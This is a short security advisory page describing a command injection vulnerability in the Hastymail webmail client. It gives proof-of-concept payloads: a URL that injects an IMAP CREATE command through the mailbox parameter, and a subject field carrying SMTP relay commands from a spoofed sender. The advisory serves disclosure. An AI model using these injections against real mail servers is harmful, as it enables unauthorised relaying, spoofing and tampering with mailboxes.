Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Hastymail IMAP SMTP Command Injection Vulnerability

An authenticated user can exploit this issue via a web client.

The following proof-of-concept URIs are available:

This example sends the CREATE IMAP commands to the vulnerable parameter:
http://www.example.com/<path_to_hastymail>/html/mailbox.php?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX%2522%0d%0aA0003%20CREATE
%2522INBOX.vad

The SMTP POST relay example from nonexistant email address is available:

POST http://www.example.com/<path_to_hastymail>/html/compose.php HTTP/1.1

to include:

Content-Disposition: form-data; name="subject"

Proof of Concept
.
mail from: hacker@domain.com
rcpt to: victim@otherdomain.com
data
This is a proof of concept of the SMTP command injection in Hastymail
.







 

Privacy Statement
Copyright 2009, SecurityFocus